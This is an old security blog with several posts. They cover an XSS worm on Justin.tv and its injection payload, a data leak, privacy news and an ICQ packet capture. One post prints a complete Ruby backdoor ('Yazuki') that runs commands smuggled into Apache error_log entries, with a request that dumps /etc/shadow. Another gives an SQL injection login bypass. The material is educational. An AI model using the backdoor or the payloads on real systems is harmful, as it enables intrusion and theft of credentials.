Justin.tv hit by XSS Worm
Another XSS Worm has come to life. This time the video and chatting community [justin.tv] has been hit by a XSS Worm, that was non-malicious and only a Proof-of-Concept another time. The worm has been coded and set to life by the authors of the website [www.thedefaced.org]. The original news I have read can be found on [xssed.com]. x2Fusion from TheDefaced has stated the following concerning the worm:
This actually is the very first XSS worm which we have unleashed, and it was solely upon research reasons; non-malicious at all :) We've contacted the JTV Programmers prior to the fixing of the XSS worm and have sorted things out with them and made sure that they knew NO information such as IP Address, Cookies, Sessions and further information which poses private is not to be released. After that I put myself forward and found another XSS in turn to prove that I was dedicated to helping JTV out in any further possible vulnerabilities.
The worm has been made possible due to a bad (no) sanitization of the "Location" field in the users profile. It was possible to inject arbitrary commands and the authors used the following to inject the worms code:
<iframe id='tframeid' width=0 height=0 frameborder=0></iframe> <script src="justinworm.js" language="javascript"></script>"
The authors of xssed.com have made a graphic (PNG) showing the development of the worm in the network of justin.tv, look [here].
The worms source code can be found on [worms.xssing.com/sources/justintv.txt]. It is open to everyone due to the fact, that the autors coded it for educational purpose only. Furthermore the vulnerability is still fixed, to be precise it has been fixed on Sun, 29 Jun 2008 21:12:21 GMT.
What to say? Well, another time an XSS Worm has found its way to light, comprosing 2525 profiles at all and again it was NOT malicious! XSS Worms are still very young in the web and there are about one dozen around, all publicly available to learn from them, BUT and this is the problem: I guess it won't take very long anymore till the first malicious people come into the game and use the knowledge the good guys also have to do "bad" stuff. The potential is immense. Just imagine a malicious XSS Worm would manipulate the profile of a user and embed a manipulated SWF file into it, that will automatically try to attack users browser to execute arbitrary commands on the victims machine and install malware, for botnets, for spam, for whatever might be interesting. The time will come, if website administrators don't learn it NOW they will soon learn it the hard way. It is still time to learn it the soft way, by the help of such people like x2Fusion, who do ethical hacking, but it won't stay like this forever!
Wired-Security readers know first
Reading my emails todays morning I also received one by a friend of mine (Marko Rogge), which pointed me to a Heisec news entry. The news entry can be found [here] and is titled with "MSN-Phishing und Link-Spam greift um sich", which translates to something like "MSN-Phishing and Link-Spam is increasing". This entry has been made on the 7th of July or in other words: Yesterday. Readers of Wired-Security know this problem till one month, check the archive for the [news].
Furthermore the news entry of Heise is not very informative, it does not say a lot about the whole problem, nothing about the website, the hoster etc... And there is one specific point missing: The problem is not only a problem of MSN, the website of the Phishers also includes a login field for ICQ. All that is missing in the entry of Heise.
What shall I say? I am quite angry about this news because I informed Heise in an email ONE MONTH ago and I can proof this and they totally ignored my email and NOW, after one month they write about it as if THEY found this out. This is not only unprofessional, this keeps user to a risk for over 30 days being uninformed!
To proove I am not lying, here is the source code of my email sent to them:
MIME-Version: 1.0 Date: Wed, 4 Jun 2008 22:31:25 +0200 From: <skyout@wired-security.net> To: red@heisec.de Subject: MSN/ICQ Phishing Message-ID: <61a07e03c1e1286dd80dd97b20947d7e@s2.nexpaserver.de> X-Sender: skyout@wired-security.net User-Agent: RoundCube Webmail Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit http://wired-security.net/archive/2008/june/index.php#04_2_062008 Please look closer at this and maybe blog about it. If you do so, please be so fair to link back to my blog. Thanks. SkyOut.
Look at the date: 4th of JUNE! So instead of being so fair to blog about it and link back to my blog say instead ignored it and make their users believe they have found something new one month later then my users know it... This is unprofessional and awkward!
Conclusion: Next time I won't inform Heise anymore. Let them be uninformed if they can not even credit those, who informed them.
Apache error_log Backdoors (DE)
It's been quite a while since I posted my last Hakin9 article here, but now it is time for a new article. I planned to release it much earlier, so sorry for the delay. The article is called "Apache error_log Backdoors" and has been released in Hakin9 2/2008 (March).
The theory of the article is the following: Every time a user connects to an Apache webserver and tries to access a website, that is not there, an information about this access gets written to the error_log file of Apache, which is normally stored in /var/www/logs/error_log. We will use this feature to get shell commands, that then get executed. I have coded a Proof-of-Concept code called Yazuki in Ruby, that demonstrates a simple backdoor, look here:
#!/usr/bin/env ruby
# Name: Yazuki
# Author: SkyOut
# Date: October 2007
# Website: http://wired-security.net/
# Used Ruby Version. 1.8.4
# Tested on: OpenBSD 4.1
# This Proof-of-Concept code shows a simple backdoor
# concept, that does not need any open port to execute
# shell commands. Yazuki will search the error_log file
# of Apache every 5 seconds for a specified password and
# executes the given command, that can have up to five
# arguments (for more, just edit line 41).
# Possible commands: (Make sure to always have five arguments
# or edit line 41)
# less /etc/passwd > /var/www/htdocs/pw.txt ;
# ls -a /home > /var/www/htdocs/home.txt
# Start an indefinite loop
x = 0
while (x == 0)
# Define the error_log file of Apache
error_log = "/var/www/logs/error_log"
# Open Apaches error_log file
if (File.file?(error_log))
if (File.readable?(error_log))
File.open("#{error_log}").each { |line|
# Define the password
if line =~ /password/
# Make an array of the error_log line
array = line.split(" ");
# Take the 5 last arguments
command = array.fetch(13) + " " + \
array.fetch(14) + " " + array.fetch(15) \
+ " " + array.fetch(16) + " " + array.fetch(17)
# Execute the command
IO.popen("#{command}")
# Truncate the error_log file again
if (File.writable?(error_log))
File.truncate(error_log, 0)
end
end
}
end
end
# Wait 5 seconds
sleep 5
end
How does this code work? Well, it is very simple. We define a password (for example "password" (you should choose something better of course)) and then we connect to the server like this:
GET /password [our shell commands go here] HTTP/1.1 Host: www.example.com [newline] [newline]
So, let's say we have installed our backdoor as root, then we could for example send the following command to the webserver:
GET /password cat /etc/shadow > /var/www/htdocs/shadow ; HTTP/1.1 Host: www.example.com [newline] [newline]
Now of course this file won't exist, so it will drop an error in error_log. That file is searched through by our backdoor every 5 seconds and if our program finds a line, which contains our specified password it will take the 5 commands after this, put it together and send it to the underlying command shell. In the code this are the following lines:
if line =~ /password/
array = line.split(" ");
command = array.fetch(13) + " " + \
array.fetch(14) + " " + array.fetch(15) \
+ " " + array.fetch(16) + " " + array.fetch(17)
IO.popen("#{command}")
After that the file gets truncated again and we can now read the shadow file connecting to the webserver as follows:
GET /shadow HTTP/1.1 Host: www.example.com [newline] [newline]
The whole article printed in Hakin9 can be found [here] (Texts -> Attack).
The Proof-of-Concept code can be found [here] (Releases -> Hacking/Cracking).
HTTP GET Request in C (Win32)
I am just developing a program, that uses a GET Request to get data from a website. The first basic steps are done. Thanks to the help from WildCat. If you want to look at the first steps, here we go. The headers and stuff:
#include <stdio.h> #include <windows.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") #define MAX_PATH 512 #define PORT 80 SOCKET sock; SOCKADDR_IN remote_addr;
Then we have a function to set the host (could also be used to get the IP out of a hostname, see the lines commented out):
//u_long getip(const char *host)
void sethost(const char *host)
{
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE)
{
if((hp = gethostbyname(host)) != NULL)
{
//host_ip = *(u_long *)hp->h_addr_list[0];
sock = socket(AF_INET, SOCK_STREAM, 0);
memset(&remote_addr, 0, sizeof(SOCKADDR_IN));
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons(PORT);
memcpy(&remote_addr.sin_addr,hp->h_addr_list[0],hp->h_length);
}
}
//return host_ip;
}
And finally the main() function to send the GET Request:
int main()
{
WSADATA wsaData;
char buffer[MAX_PATH];
char recvbuff[MAX_PATH];
int recvbufflen = MAX_PATH;
int res;
WSAStartup(MAKEWORD(2, 0), &wsaData);
sock = socket(AF_INET, SOCK_STREAM, 0);
sethost("www.example.com");
connect(sock, (SOCKADDR*)&remote_addr, sizeof(SOCKADDR));
sprintf(buffer, "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n");
send(sock, buffer, strlen(buffer), 0);
res = recv(sock, recvbuff, recvbufflen, 0);
if (res > 0)
{
// do stuff here ...
}
WSACleanup();
return 0;
}
In future I will blog a bit more about this if it goes further!
Data of 41000 citizens in the net
The Chaos Computer Club printed a news about a big data problem occurring on the website of the market research institution TNS Infratest/Emnid. It was possible to get informations about 41000 (maybe more) citizens, that worked together with the institutions. The problem was as simple as shocking as stupid. The URL of the website looked like the following: www.report-global.com/mimitacon/[some stuff]/pages/business/masterdata.aspx?fromWhere=base&id=11XXXX. When you logged in with a working account you first of only saw the details of that specific account, but when you just changed the field "id" it was possible to see the data profiled of other citizens. With a simple Python script the CCC was able to get about 41000 data sets.
What is really shocking is how detailed those reports were. Your email adress has been written there, your date of birth, your phone number. Futhermore very sensitive data could be seen, like your incomes, your job, your health insurance, your bank informations, your credit cards used and much more...
How was the CCC able to get to those informations, did they hacked into it? No, not really... They got a mail with a valid account and looked closer at the website. That simple, that shocking.
The original article at [www.ccc.de].
All your data are belong to us
Not being in the best mood anyway, I just came accross a news on the blog of wired.com, which really shocked me: All YouTube logs have to be handed over to a company called Viacom. The whole logs are of a size of 4 Terrabyte, including users names and IP adresses, all the videos they have watched and everything they did on the website of YouTube. Viacom filed suit against Google in March 2007 for allowing users to upload copyright protected material to YouTube and they speak of a damage to them of 1 billion USD. Now Google is forced to give over ALL their logs to Viacom and they want to proof with this, that people are watching a lot of copyright protected material, more then free material.
Viacom even wanted more, wanted to have a copy of every video marked as private and more. This has been denied, but nevertheless the story is quite shocking to me. What is this all going to become in future? The whole concept of Web 2.0 seems at risk as companies force websites to shut down if they feel, that copyright laws are broken. This case is a perfect example for this and it's even worse, that Viacom now has the right to get the logs, decided by a court on Wednesday.
How is this all going to become in future? Are all those great project forced down by companies? That would be very bad as it would turn the internet to something else than it is now.
Original post: [blog.wired.com].
CFP for 25c3 opened now
The Call For Participation/Papers for the annual congress of the Chaos Computer Club has opened its gate. You can now hand in your ideas you would like to talk, make a workshop about or whatever. The topics are as always: Hacking, Making, Science, Society, Culture and Community. From the page of the Chaos Computer Club:
Criteria by which we assess a lecture * we consider the topic in general relevant for the participants * we consider the topic currently relevant for the participants * we consider the topic interesting, fun and worthy to be known more about * the lecture is about something the speaker made himself * we think the lecture might be fun * the lecture is part of a workshop (has a second part which is a workshop) * the lecture presents something new * the more information provided about the lecture and the speaker the better
The following "Dates and Deadlines" have been set:
* October 5th, 2008 (Midnight UTC) Submission due * November 7th, 2008 (Midnight UTC) Final notification of acceptance (or earlier) * November 28th, 2008 (Midnight UTC) Final papers due * December 27th - 30th, 2008 Chaos Communication Congress
To submit something go to [cccv.pentabarf.org/submission/25C3].
The "Jonny Hell" case
(click to enlarge image)
It's been quite a while since a topstory about a hacker has found its way into the media, but now it happened again. Talking to my father tomorrow he told me, that he has read a story in the newspaper about a guy called Aleksandr Suvorov, better known in the internet as "Jonny Hell", who has been caught at Frankfurt (Main) International Airport by Secret Service agents of the US and brought to prison. I read it also in the internet, coming across "Spiegel Online". The story is very interesting because of several things.
First of all it has to be said, that some newspapers talk of Aleksandr Suvorov as the worldwide most wanted hacker (which is typically for media to make it more shocking *no comment*) and for sure he is a big fish, that they got, no question. "Spiegel Online" talks of millions of stolen credit cards, that caused a damage to the people and companies of more then 100 million USD. Some other newspapers talk of only a few million. All in all the story is not totally clear, the media hype is immense. For example the "hack" of a cafe in the state of New York gave the hackers access to 5000 credit card numbers. But look closer:
Jonny Hell isn't such a case like every other one. Many things are unclear and the way his seizure happened is against law! That has to be stated. Secret Service agents have NO right to catch a person on german ground and bring him to prison. Furthermore the warrants of arrest for installing a trojan (packet sniffer) on the restaurants computer has been written out on the 12th of March this year. One week AFTER the seizure. What is also interesting is HOW LONG it takes until such a story comes to public newspapers. It takes months until the people are informed about what happened.
Let me make a cut here of the story of "Jonny Hell" and let's turn around. Is this really a rare case? Did this only happen to him and because he is SO DANGEROUS? Or can this happen to every little and small fish out there, evil or not, guilty or not? The answer is simple: It can happen to everyone and it did. If you are part of the german hacker community you should still know it, if not I will tell you. A person known under the handle of Rembrandt has been caught similar, but much more rudely on the 22nd of March in 2007 in a restaurant in Berlin by agents, that not even said, who they are or what they want. They took him with them in a car and brought him to a place he did not know of, no chance to find out where he was. He had to sign a statement to be left free and they told him if he would not sign it, they could keep him for days and longer. They wanted to scare him and make him admit, that he has hacked into the network of the Deutsche Bank for more than half a year. Even until today there has been no official charge against him, but the consequences of your apartment being raided, yourself being kept in a prison without the right to call a lawyer and more, are more fatal then a charge could be. Your chances to get a well paid job in the security industry equal almost zero.
Think about it: Do you still think democracy works? Do you think it is more then a word written on a paper? If yes, why can it happen, that people get caught by agents, that have no right to and won't face consequences for doing so? Why can it happen, that people are forced to sign a statement without speaking to a lawyer, without knowing what's actually going on, without a PROOF!? ... Take a moment, think about it.
Why ICQ sucks
I was at work today, chatting with some friends on ICQ. Around 18 o' clock I went home and wanted to log in to my account again, which resulted in an error message by Pidgin. My instant messenger could not log in to ICQ anymore, but instead gave me the message "Your version is not up-to-date to work with ICQ, go to http//pidgin.im/". I guess millions have seen this message and the site was no longer reachable, could be a logical DDoS, whatever. To make Pidgin work again you would have to recompile the whole program and change a value in the header file oscar.h from 0x010a to 0x010b. For linux users this might work out, but for Windows it is really annoying. So, why does ICQ do this? Simple answer: They want to force people to upgrade to ICQ 6, their new and "cooler" version of the client. If you check the whole thing with Wireshark while connecting you will get to see something like this (tip: look for the *.exe, that is, what they want you to download and install):
Frame 35 (669 bytes on wire, 669 bytes captured)
Ethernet II, Src: ZonetTec_e1:57:32 (00:50:22:e1:57:32), \
Dst: *:*:* (*:*:*:*:*:*)
Internet Protocol, Src: 64.12.161.153 (64.12.161.153), \
Dst: *.*.*.* (*.*.*.*)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
Total Length: 655
Identification: 0x8aa2 (35490)
Flags: 0x04 (Don't Fragment)
Fragment offset: 0
Time to live: 105
Protocol: TCP (0x06)
Header checksum: 0xb325 [correct]
Source: 64.12.161.153 (64.12.161.153)
Destination: *.*.*.* (*.*.*.*)
Transmission Control Protocol, Src Port: aol (5190), \
Dst Port: 11234 (11234), Seq: 11, Ack: 102, Len: 615
Source port: aol (5190)
Destination port: 11234 (11234)
Sequence number: 11 (relative sequence number)
[Next sequence number: 626 (relative sequence number)]
Acknowledgement number: 102 (relative ack number)
Header length: 20 bytes
Flags: 0x18 (PSH, ACK)
Window size: 16384
Checksum: 0x7577 [correct]
[Good Checksum: True]
[Bad Checksum: False]
[SEQ/ACK analysis]
[PDU Size: 615]
AOL Instant Messenger
Command Start: 0x2a
Channel ID: Close Connection (0x04)
Sequence Number: 26668
Data Field Length: 609
TLV: Unknown
Value ID: Unknown (0x008e)
Length: 1
Value
TLV: Screen name
Value ID: Screen name (0x0001)
Length: 9
Value: 410996901
TLV: BOS server string
Value ID: BOS server string (0x0005)
Length: 17
Value: 64.12.25.112:5190
TLV: Authorization cookie
Value ID: Authorization cookie (0x0006)
Length: 256
Value
TLV: Error Code
Value ID: Error Code (0x0008)
Length: 2
Value: 28
TLV: Error URL
Value ID: Error URL (0x0004)
Length: 46
Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
TLV: Latest Beta Build
Value ID: Latest Beta Build (0x0040)
Length: 4
Value: 11
TLV: Latest Beta Name
Value ID: Latest Beta Name (0x0043)
Length: 9
Value: 5.33.3000
TLV: Latest Beta URL
Value ID: Latest Beta URL (0x0041)
Length: 46
Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
TLV: Latest Beta Info
Value ID: Latest Beta Info (0x0042)
Length: 52
Value: http://download.icq.com/download/icq6/whats_new.html
TLV: Latest Release Build
Value ID: Latest Release Build (0x0044)
Length: 4
Value: 11
TLV: Latest Release Name
Value ID: Latest Release Name (0x0047)
Length: 9
Value: 5.33.3000
TLV: Latest Release URL
Value ID: Latest Release URL (0x0045)
Length: 46
Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
TLV: Latest Release Info
Value ID: Latest Release Info (0x0046)
Length: 52
Value: http://download.icq.com/download/icq6/whats_new.html
Code Injection? (2)
Last month I talked a about a possible Code Injection in a PHP file, that did not occurr as I found out with some help of another person. Then this person suggested, that a stacked query could work to inject SQL commands, but also this did not work because mysql_query() does not allow stacked queries. All about this you can find in the [archive]. But why do I write about it again? Because there is a possible way to inject SQL commands and bypass the script! Let's look at it again. This is the script:
[...] $anmeldename=$_POST['anmeldename']; $passwort=$_POST['passwort']; $sql="SELECT * FROM `member` WHERE `Anmeldename`='$anmeldename'"; $erg=mysql_query($sql); $zeile = mysql_fetch_object($erg); $spw=md5($passwort); if($zeile->Passwort==$spw) [...]
So how can we bypass this script? Let's assume, that the table "members" has two columns: "Anmeldename" and "Passwort". So the table should look like this:
+-------------+----------------------------------+ | Anmeldename | Passwort | +-------------+----------------------------------+ | admin | unknown to us | +-------------+----------------------------------+
So, now the interesting thing are the last two lines. The password gets hashed with MD5 and is saved to $spw. Then the most interesting part comes in. The first line, that is given back by mysql_fetch_object() is searched for the field "Passwort" and that result is compared to the MD5 hash of the POSTed password. Okay now don't talk endless, here is the injection:
Anmeldename: x' LIMIT 0 UNION ALL SELECT 'admin', \ '9990775155c3518a0d7917f7780b24aa Passwort: ttt
What does happen here? The query will finally look like this if the injection works: "SELECT * FROM `member` WHERE `Anmeldename`='x' LIMIT 0 UNION ALL SELECT 'admin','9990775155c3518a0d7917f7780b24aa'". Which will result in a table looking like this:
+-------------+----------------------------------+ | Anmeldename | Passwort | +-------------+----------------------------------+ | admin | 9990775155c3518a0d7917f7780b24aa | +-------------+----------------------------------+
And now we give the password "ttt" to the script, which is "9990775155c3518a0d7917f7780b24aa" as a MD5 hash! So finally "if($zeile->Passwort==$spw)" gets this "if(9990775155c3518a0d7917f7780b24aa==9990775155c3518a0d7917f7780b24aa)" and that is TRUE, which results in? Guess? Yeap, you are logged in!
Thanks go to [WildCat], who has tested this for me and can say for sure, that it works under PHP 5 plus MySQL 5!
UPDATE: Another time I have to update this news (seems like they never want to end). Veda again messaged me and told me it will work as a Code Injection if you use backticks. As a proof-of-concept he opened up the PHP interpreter on his local machine and did the following:
% php -a php > print md5(); Warning: md5() expects at least 1 parameter, 0 given in php shell \ code on line 1 php > print md5(x); 9dd4e461268c8034f5c8564e155c67a6 php > print md5(`mkdir foo`); [...] % ls foo
No comment from my side! I hope that's it! EOF!
UPDATE 2: So another update... I won't comment this anymore, look for yourself:
joern@heaven:~$ cat test.php
<?
$string = "`touch skyout-win`";
echo md5(x)."\n";
echo md5('')."\n";
echo md5(`touch skyout-fail`)."\n";;
echo md5($string)."\n";;
?>
joern@heaven:~$ php test.php
9dd4e461268c8034f5c8564e155c67a6
d41d8cd98f00b204e9800998ecf8427e
d41d8cd98f00b204e9800998ecf8427e
70f42a7d8d215d0c5f0078b58ca5730f
joern@heaven:~$ ls skyout*
skyout-fail
joern@heaven:~$